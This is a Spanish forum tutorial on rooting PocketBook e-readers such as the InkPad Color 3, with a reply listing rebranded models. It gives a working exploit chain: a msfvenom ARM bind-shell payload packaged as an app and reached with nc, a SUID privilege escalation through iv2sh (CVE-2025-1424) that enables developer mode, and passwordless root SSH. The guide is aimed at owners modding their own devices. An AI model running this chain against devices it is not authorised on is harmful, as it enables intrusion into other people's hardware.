TUTORIAL+ Cómo conectarse vía SSH como root a un PocketBook (InkPad Color 3, Verse Pro Color, etc)

Lectores de libros electrónicos (TUTORIAL+)

Cómo conectarse vía SSH como root a un PocketBook (InkPad Color 3, Verse Pro Color, etc)

segnini

La familia es lo primero
Admin
SuperMod
Corazón DualSIM
Mensajes
7.638
Puntos
9.568
Móvil
Samsung Galaxy S24 Ultra

Conectarse vía SSH como root a un PocketBook (InkPad Color 3, Verse Pro Color, etc)

Última actualización: 1 de Agosto del 2025


Uno de los modelos que deja conectarse por SSH : InkPad Color 3
🔍 Introducción

Si eres dueño de un PocketBook InkPad Color 3, Verse Pro Color u otros modelos similares, es posible que desees tener control total sobre tu dispositivo. Gracias a un análisis de seguridad reciente, se descubrieron vulnerabilidades que permiten escalar privilegios y obtener acceso root en el dispositivo.

En esta guía, te explicaremos paso a paso cómo aprovechar estas vulnerabilidades para activar el modo desarrollador, habilitar SSH y ganar acceso completo a tu e-reader.


📌 Requisitos Previos

✅ Dispositivo PocketBook (InkPad Color 3, Verse Pro Color, u otros modelos afectados).
✅ Conexión USB y acceso físico al dispositivo.
✅ Ordenador con Linux (o WSL en Windows).
✅ Conocimientos básicos de la terminal.


🚀 Paso 1: Obtener un Shell Básico

Primero, necesitamos ejecutar comandos en el dispositivo. Para ello:

  1. Conecta el PocketBook a tu PC y selecciona "PC LINK" en el menú.
  2. Crea un binario de bind shell (un acceso remoto) usando msfvenom:

    Bash:
    msfvenom -p linux/armle/shell_bind_tcp LPORT=1337 -f elf -o bind.app
  3. Copia bind.app en la carpeta de aplicaciones del PocketBook.
    1000133164.jpg
  4. Ejecuta la aplicación desde el menú del e-reader.
  5. Conéctate al shell desde tu PC:
    Bash:
    nc <IP_DEL_POCKETBOOK> 1337
  6. Verifica que tienes acceso con:
    Bash:
    id

    Deberías ver:

    Bash:
    uid=101(reader) gid=101(reader) groups=3003

🔓 Paso 2: Escalada de Privilegios (CVE-2025-1424)

El dispositivo tiene un binario SUID (iv2sh) que permite escribir archivos como el usuario sreader, lo que nos permite activar el modo desarrollador.

  1. Crea el archivo developer_mode en /mnt/secure/:
    Bash:
    sh -c '/usr/cramfs/bin/iv2sh WriteConfig /mnt/secure/developer_mode privesc 1'
  2. Reinicia el dispositivo para aplicar los cambios.

1754071077457.png



🔌 Paso 3: Acceso Root vía SSH (Modo Desarrollador)

Al reiniciar, el PocketBook configurará una interfaz USB con SSH:

  1. Verifica la IP asignada en tu PC:

    Bash:
    ip a
    Busca la interfaz usb0 con una IP como 192.168.205.2.
    1754071045382.png
  2. Conéctate por SSH como root:
    Bash:
    ssh -o HostKeyAlgorithms=ssh-rsa [email protected]
    (No se requiere contraseña).
1754071028318.png



🎉 ¡Ahora tienes acceso root en tu PocketBook!


🔧 Posibles Usos Avanzados

Instalar aplicaciones personalizadas.
Modificar configuraciones del sistema.
Hacer backup completo del firmware y la configuración.
Descubrir opciones ocultas.
Ejecutar scripts personalizados.


⚠️ Advertencias y Consideraciones

🔴 Esto podría anular la garantía del dispositivo.
🔴 Si no tienes cuidado, puedes dañar el sistema modificando o eliminando archivos críticos.


🛡️ ¿Cómo Proteger tu PocketBook?

Si no quieres que alguien más explote esta vulnerabilidad:
❌ No permitas acceso físico no autorizado.
❌ No copies aplicaciones desconocidas en el dispositivo.
❌ Configura una contraseña de bloqueo (si el firmware lo permite).

Todo esto es posible gracias a que el PocketBook al iniciarse tiene un fichero que define la configuración del USB y dentro de este indica que si existe el archivo en /mnt/secure/developer_mode entonces creará una red con la que podrás conectarte al Ebook Reader.

1754071145640.png
 
Última edición:
Esto también podría aplicar a otras marcas que venden hardware de PocketBook:

MarcaRegión principal¿Usa hardware PocketBook?¿Usa firmware propio?Enfoque / Observaciones
VivlioFrancia, Bélgica✅✅Firmware personalizado, integración con tienda y nube Vivlio. Rebranding total de PocketBook.
TolinoAlemania, Austria, Suiza✅ Parcial✅Algunos modelos recientes son fabricados por PocketBook (desde que Kobo gestiona el ecosistema Tolino).
BookeenFrancia✅ En algunos modelos✅Marca histórica que ha recurrido a hardware PocketBook en ciertas generaciones como el Diva HD.
TRE (The Reading Edge)Israel✅❌ NoDistribuye PocketBook con nombre y soporte local. Sin cambios en firmware.
BiblioPolonia, Europa del Este✅✅ ParcialMarca polaca que vende modelos como el Biblio Lux o Biblio Touch, con hardware PocketBook y ligeros ajustes en el software.
 
Atrás
Arriba